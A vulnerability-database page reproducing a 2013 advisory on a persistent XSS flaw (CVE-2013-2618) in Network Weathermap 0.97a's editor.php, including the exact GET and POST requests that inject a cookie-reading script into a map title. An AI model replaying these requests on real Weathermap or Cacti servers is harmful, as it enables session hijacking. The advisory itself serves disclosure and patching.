Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDaniel Ricardo1337DAY-ID-20595
HistoryApr 02, 2013 - 12:00 a.m.

Network Weathermap 0.97a (editor.php) - Persistent XSS

2013-04-0200:00:00
Daniel Ricardo
0day.today
39

0.133 Low

EPSS

Percentile

95.0%

JSON

Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying
available files.

INTRODUCTION
 
Network Weathermap is a network visualisation tool, to take data you
already have and show you an overview of your network in map form.
Support is built in for RRD, MRTG (RRD and old log-format), and
tab-delimited text files. Other sources are via plugins or external scripts.
 
VULNERABILITY DESCRIPTION
 
The vulnerability happens when a user injects HTML and Javascript into the
title of a map in editor.php. This title is later shown to the user when
listing the files in editor.php?action=newfile
 
Besides the title, other fields also allow an attacker to upload malicious
PHP code to a webserver, which can later be executed if the attacker has
direct acess to that file.
 
This application is often used as a plugin for Cacti. The vulnerability can
be exploited in this mode as well, in
weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and
it can be used to exploit Cacti.
 
To test it, simply create a map or edit an existing one:
GET editor.php?mapname=test&action=newmap
 
Then edit the map title with the payload:
POST editor.php
plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO
 
Then display the titles:
GET editor.php

#  0day.today [2018-03-19]  #

Related

checkpoint_advisories 1
packetstorm 1
prion 1
attackerkb 1
cvelist 1
exploitpack 1
cve 1
f5 1
seebug 1
exploitdb 1
checkpoint_advisories
checkpoint_advisories
Network Weathermap Persistent Cross-Site Scripting (CVE-2013-2618)
2018-08-15 00:00:00
packetstorm
packetstorm
Network Weathermap 0.97a Cross Site Scripting
2013-04-01 00:00:00
prion
prion
Cross site scripting
2014-06-05 20:55:00
attackerkb
attackerkb
CVE-2013-2618
2014-06-05 00:00:00
cvelist
cvelist
CVE-2013-2618
2014-06-05 20:00:00
exploitpack
exploitpack
Network Weathermap 0.97a - editor.php Persistent Cross-Site Scripting
2013-04-02 00:00:00
cve
cve
CVE-2013-2618
2014-06-05 20:55:00
f5
f5
K44164245 : XSS vulnerability CVE-2013-2618
2018-05-23 00:00:00
seebug
seebug
Network Weathermap 0.97a (editor.php) - Persistent XSS
2014-07-01 00:00:00
exploitdb
exploitdb
Network Weathermap 0.97a - &#039;editor.php&#039; Persistent Cross-Site Scripting
2013-04-02 00:00:00

0.133 Low

EPSS

Percentile

95.0%

JSON
Related for 1337DAY-ID-20595
checkpoint_advisories1packetstorm1prion1attackerkb1cvelist1exploitpack1cve1f51seebug1exploitdb1